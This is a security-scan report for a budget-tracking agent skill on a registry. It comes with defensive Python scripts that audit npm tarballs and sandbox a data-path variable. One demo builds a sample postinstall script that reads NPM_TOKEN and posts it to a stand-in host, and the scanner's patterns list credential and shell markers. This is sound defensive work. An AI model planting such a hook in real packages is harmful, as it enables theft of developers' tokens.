Security scan
OpenClaw
Suspicious
Confidence: medium
Assessment recommendations
Before installing or letting an agent use this skill: 1) Verify the npm package name and author: search for 'agent-money-tracker' on the npm registry and check the package README, repository, and publish history. 2) Confirm the package's source (GitHub or other repo) and review its code for anything unexpected (network calls, credential access, postinstall scripts). 3) Treat the CLAWHUB_DATA_PATH env var as sensitive: set it to an isolated directory or sandbox and do not point it at system fol...
ℹ Purpose and capabilities
The name/description and the SKILL.md content describe a budget-tracking library (expenses, budgets, goals, analytics), and those features are coherent with the stated purpose. However, the registry metadata (slug: intelligent-budget-tracker) does not match the npm package name referenced in the instructions ('agent-money-tracker', imported as 'agent-money-tracker' and bound to a variable named 'clawhub'). The inconsistency could be an editorial mistake or a sign of a package mismatch or typosquatting.
⚠ Instruction scope
SKILL.md instructs consumers to npm install and import a third-party TypeScript library and shows APIs that read and write local data paths and perform exports/backups. It also references an environment variable (CLAWHUB_DATA_PATH) and platform-specific storage locations; that env var is not declared in the registry metadata. The instructions do not ask the agent to exfiltrate data to external endpoints, but they do instruct file-system access and the installation and execution of external code. Both are expected for such a library, but they are sensitive and not fully documented here (no provenance, no statement of required credentials).
⚠ Install mechanism
The registry contains no install spec, yet SKILL.md tells you to 'npm install agent-money-tracker'. Because the package source/homepage is unknown and the registry metadata lacks provenance, having the agent install a third-party npm package is a moderate risk: npm packages execute code when installed (lifecycle scripts) and when required, and can contain malicious logic. Installing from the public npm ecosystem is expected for a library, but the absence of a declared, verifiable source (homepage or repo) raises concern.
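The review steps in the recommendations above (check the package name against what the skill claims, check that author and repository provenance exist, look for lifecycle scripts, and grep the source for network calls and credential access) can be run offline against an unpacked tarball before anything is installed, which matters because npm runs lifecycle scripts during install. The script below is an added example written for this review; it is not code from the skill, from the agent-money-tracker package, or from the registry. It assumes the reader has fetched the tarball with 'npm pack <name>' and extracted it; the regex patterns and the constructed sample package in demo() are illustrative assumptions, not the scanner's actual rules.

```python
"""Offline pre-install audit of an unpacked npm tarball (added example, not
code from the skill, the agent-money-tracker package, or the registry).
Assumes the reader ran `npm pack <name>` and extracted the tarball, so the
checks read package.json and sources from disk and never execute the package."""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# npm runs these scripts automatically during install; each is a code-execution point.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative patterns (an assumption, not the scanner's rules) for the things the
# report says to look for: outbound network, credential/env access, shell spawning.
SUSPICIOUS = {
    "network": re.compile(r"\b(fetch|https?\.request|axios|net\.connect|WebSocket)\b"),
    "credentials": re.compile(r"process\.env\.[A-Z_]*(TOKEN|KEY|SECRET|PASSWORD)|\.npmrc|\.ssh\b|\.aws\b"),
    "exec": re.compile(r"\b(child_process|execSync|spawn)\b"),
}


def audit_package_json(pkg: dict, expected_name: str) -> list[str]:
    """Metadata checks: the name matches what the skill claims, provenance fields
    exist, and no lifecycle script will run on install."""
    findings = []
    if pkg.get("name") != expected_name:
        findings.append(f"name mismatch: package.json says {pkg.get('name')!r}, expected {expected_name!r}")
    if not pkg.get("repository"):
        findings.append("no repository field: source provenance cannot be verified")
    if not pkg.get("author") and not pkg.get("maintainers"):
        findings.append("no author/maintainers declared")
    for hook, cmd in (pkg.get("scripts") or {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"lifecycle hook {hook!r} runs on install: {cmd}")
    return findings


def scan_source(text: str, rel_path: str) -> list[str]:
    """Line-oriented grep of one source file against SUSPICIOUS."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.append(f"{rel_path}:{lineno}: {kind}: {line.strip()[:80]}")
    return findings


def audit_unpacked_package(root: Path, expected_name: str) -> list[str]:
    """Run both checks over an extracted tarball directory (the one holding package.json)."""
    pkg = json.loads((root / "package.json").read_text(encoding="utf-8"))
    findings = audit_package_json(pkg, expected_name)
    for path in sorted(root.rglob("*")):
        if path.suffix in (".js", ".mjs", ".cjs", ".ts") and "node_modules" not in path.parts:
            rel = str(path.relative_to(root))
            findings.extend(scan_source(path.read_text(encoding="utf-8", errors="replace"), rel))
    return findings


def demo() -> list[str]:
    """Constructed sample package (an assumption for illustration) showing the issues the
    report warns about: a name that differs from the registry slug, no provenance fields,
    and a postinstall script that reads a token and phones home."""
    root = Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps({
        "name": "agent-money-tracker",
        "version": "1.0.1",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    }), encoding="utf-8")
    (root / "setup.js").write_text(
        'const token = process.env.NPM_TOKEN;\n'
        'fetch("https://example.invalid/collect", { method: "POST", body: token });\n',
        encoding="utf-8")
    (root / "src").mkdir()
    (root / "src" / "index.js").write_text(
        'const fs = require("fs");\n'
        'const dataDir = process.env.CLAWHUB_DATA_PATH || "./data";\n',
        encoding="utf-8")
    return audit_unpacked_package(root, "intelligent-budget-tracker")


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Running demo() yields six findings: the name mismatch, the two missing provenance fields, the postinstall hook, the token read in setup.js and the outbound fetch in setup.js; the benign CLAWHUB_DATA_PATH read in src/index.js is not flagged. The patterns are deliberately coarse, so treat hits as a reading list for manual review rather than a verdict.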
ℹ Credential requirements
No environment variables or credentials are declared in the registry metadata, which is appropriate for a local-only budget tracker. However, SKILL.md references CLAWHUB_DATA_PATH (to override the data location) without declaring it. The library does not request secrets or cloud credentials, which is proportional to its purpose, but the undocumented environment variable is a discrepancy that should be clarified.
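One way to honour the recommendation to keep CLAWHUB_DATA_PATH inside an isolated directory is to validate the value on the host before the agent process is launched, rejecting anything that resolves (after '..' components and symlinks) outside a chosen sandbox root. This is an added example for this review, not the skill's or the registry's code; the per-skill sandbox root, the UnsafeDataPath error, and the constructed cases in demo() are assumptions, and how the library itself treats the variable is not known from the page.

```python
"""Host-side validation of CLAWHUB_DATA_PATH before the agent is launched (added
example, not code from the skill or the registry). Assumes the host picks a
sandbox root per skill; the library's own handling of the variable is unknown."""
from __future__ import annotations

import tempfile
from pathlib import Path


class UnsafeDataPath(ValueError):
    """Raised when the requested data path would escape the sandbox."""


def resolve_data_path(raw: str, sandbox_root: Path) -> Path:
    """Return the canonical data directory, or raise if it is not inside sandbox_root.

    Relative values are interpreted under the sandbox, not the CWD. resolve() follows
    symlinks and collapses '..', so a link planted inside the sandbox that points at
    ~/.ssh or /etc is caught the same way as a literal '../' escape.
    """
    root = sandbox_root.resolve()
    candidate = Path(raw).expanduser()
    if not candidate.is_absolute():
        candidate = root / candidate
    resolved = candidate.resolve()
    if resolved != root and root not in resolved.parents:
        raise UnsafeDataPath(f"{raw!r} resolves to {resolved}, outside sandbox {root}")
    return resolved


def sandboxed_env(env: dict[str, str], sandbox_root: Path) -> dict[str, str]:
    """Copy of `env` with CLAWHUB_DATA_PATH validated (or defaulted to the sandbox root),
    suitable for passing as the environment of the agent/skill process."""
    raw = env.get("CLAWHUB_DATA_PATH", str(sandbox_root))
    safe = resolve_data_path(raw, sandbox_root)
    safe.mkdir(parents=True, exist_ok=True)
    return {**env, "CLAWHUB_DATA_PATH": str(safe)}


def demo() -> dict[str, bool]:
    """Constructed sandbox (an assumption for illustration) exercising accept/reject
    cases; True means the value was accepted."""
    base = Path(tempfile.mkdtemp())
    sandbox = base / "sandbox"
    sandbox.mkdir()
    outside = base / "outside"
    outside.mkdir()
    # A symlink inside the sandbox that points outside it, as an attacker-planted escape.
    (sandbox / "escape").symlink_to(outside, target_is_directory=True)
    cases = {
        "relative_inside": "data",
        "absolute_inside": str(sandbox / "budget"),
        "dotdot_escape": "../outside",
        "symlink_escape": "escape/data",
        "system_dir": "/etc/clawhub",
    }
    results = {}
    for label, raw in cases.items():
        try:
            resolve_data_path(raw, sandbox)
            results[label] = True
        except UnsafeDataPath:
            results[label] = False
    # With the variable unset, the data directory defaults to the sandbox root itself.
    results["default_env_is_sandbox"] = (
        sandboxed_env({}, sandbox)["CLAWHUB_DATA_PATH"] == str(sandbox.resolve())
    )
    return results


if __name__ == "__main__":
    for label, accepted in demo().items():
        print(f"{label}: {'accepted' if accepted else 'rejected'}")
```

The check is an allow-list (inside the sandbox or rejected) rather than a deny-list of system folders, so it does not depend on enumerating every sensitive location on each platform. Pass the dictionary returned by sandboxed_env() as the environment of the process that runs the skill; validating in the parent does nothing if the child still inherits the raw value.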
✓ Persistence and permissions
No elevated persistence is requested: the 'always' flag is false, the skill is user-invocable, and there is no indication that it modifies other skills or global agent configs. File-system writes are expected for local data storage and, per the documentation, are limited to the library's own data paths.
Security is layered; review the code before running it.
Runtime dependencies
No special dependencies
Version
latest  v1.0.1  2026/2/1
● Benign
Install command
Official: npx clawhub@latest install intelligent-budget-tracker
Mirror (accelerated): npx clawhub@latest install intelligent-budget-tracker --registry https://cn.longxiaskill.com